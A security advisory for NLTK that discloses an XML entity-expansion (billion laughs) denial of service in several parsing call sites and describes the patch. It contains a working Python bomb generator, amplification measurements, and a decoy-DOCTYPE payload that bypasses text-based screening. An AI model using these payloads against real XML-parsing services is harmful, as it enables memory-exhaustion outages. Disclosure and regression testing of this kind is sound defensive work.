GHSA-97qj-x29f-37w7High

NLTK: Entity-expansion DoS (billion laughs) via remaining raw ElementTree parses

Published
September 8, 2026
Last Modified
September 8, 2026

🔗 CVE IDs covered (1)

📋 Description

Several XML parsing sites in NLTK still used xml.etree.ElementTree directly, which honours <!ENTITY> declarations in a document's internal DTD subset. A crafted document a few hundred bytes long can expand to megabytes in memory (each nesting level multiplies by ten), a denial-of-service.

Affected call sites (<= 3.10.2):

  • nltk.chunk.named_entity.load_ace_file — parses ACE annotation XML
  • nltk.internals.ElementWrapper — converts any given string to an Element
  • nltk.downloaderPackage.fromxml, Collection.fromxml, _find_collections, _find_packages

libexpat 2.6.0 added an input-amplification cap, but it only engages above an activation threshold (~8 MiB output) and depends on whichever libexpat the interpreter links; builds against older libexpat have no cap at all. External entities are not resolved by ElementTree, so this is a memory-amplification DoS (CWE-776), not XXE/file disclosure.

This completes the earlier defusedxml adoption that these sites were missed by. Fix routes all of them through a new nltk.xmlsec module that refuses entity declarations, preferring defusedxml and falling back to a standard-library xml.parsers.expat pre-scan when defusedxml is absent.


Attack demonstration

Reproducible PoC against a real affected entry point (nltk.internals.ElementWrapper). Every number below is captured output, not illustrative.

1. The amplification (vulnerable path: raw xml.etree.ElementTree)

A payload of a few hundred bytes expands to megabytes in memory. Each nesting level multiplies output by 10 while adding ~56 bytes of input:

| levels | input bytes | expanded bytes | factor | |--------|-------------|----------------|--------| | 3 | 218 | 10,000 | x45 | | 4 | 274 | 100,000 | x364 | | 5 | 330 | 1,000,000 | x3,030 | | 6 | 386 | (libexpat 2.7.1 cap trips) | - |

The level-6 cap is libexpat's, not NLTK's: it only engages above an ~8 MiB activation threshold, and older libexpat builds (still shipped with many 3.10/3.11 interpreters) have no cap at all. Under the threshold — up to ~1 MB per parse here — expansion always succeeds.

import xml.etree.ElementTree as ET
def bomb(levels):
    d = "\n".join(f'<!ENTITY e{i} "{("&e%d;"%(i-1))*10}">' for i in range(1, levels+1))
    return f'<!DOCTYPE d [<!ENTITY e0 "AAAAAAAAAA">{d}]><d>&e{levels};</d>'
ET.fromstring(bomb(5))   # -> element whose .text is 1,000,000 chars

2. The patched entry point rejects it

>>> from nltk.internals import ElementWrapper
>>> ElementWrapper(bomb(5))
EntitiesForbidden: EntitiesForbidden(name='e0', ...)

3. Why a text-based screen is not enough

An entity declaration can hide behind a decoy <!DOCTYPE> in a prolog comment. Raw ElementTree still processes the real declaration and expands; a guard that walks the DOCTYPE text is fooled. The shipped guard re-parses with expat, so it is not:

evil = '<!-- <!DOCTYPE x [ ] > --><!DOCTYPE d [<!ENTITY a "PPPP...">]><d>&a;</d>'
raw ElementTree -> EXPANDS ('PPPPPPPPPPPP...', 40 chars)
nltk.xmlsec     -> REJECTED (EntitiesForbidden)

An earlier draft of the fallback that walked the text was bypassed by this and 4 similar payloads (decoy DOCTYPE in a PI, stray ] inside a PI in the internal subset). All five are now regression tests.

4. Both back ends block it

nltk.xmlsec prefers defusedxml and falls back to a stdlib xml.parsers.expat pre-scan. Same payloads, defusedxml hidden to force the fallback:

stdlib fallback | billion-laughs               -> REJECTED (EntitiesForbidden)
stdlib fallback | comment-decoy differential   -> REJECTED (EntitiesForbidden)

Environment: python 3.13.7, libexpat 2.7.1. Confirmed identical amplification on python 3.10 (NLTK's floor).

🎯 Affected products1

  • pip/nltk:<= 3.10.2

🔗 References (7)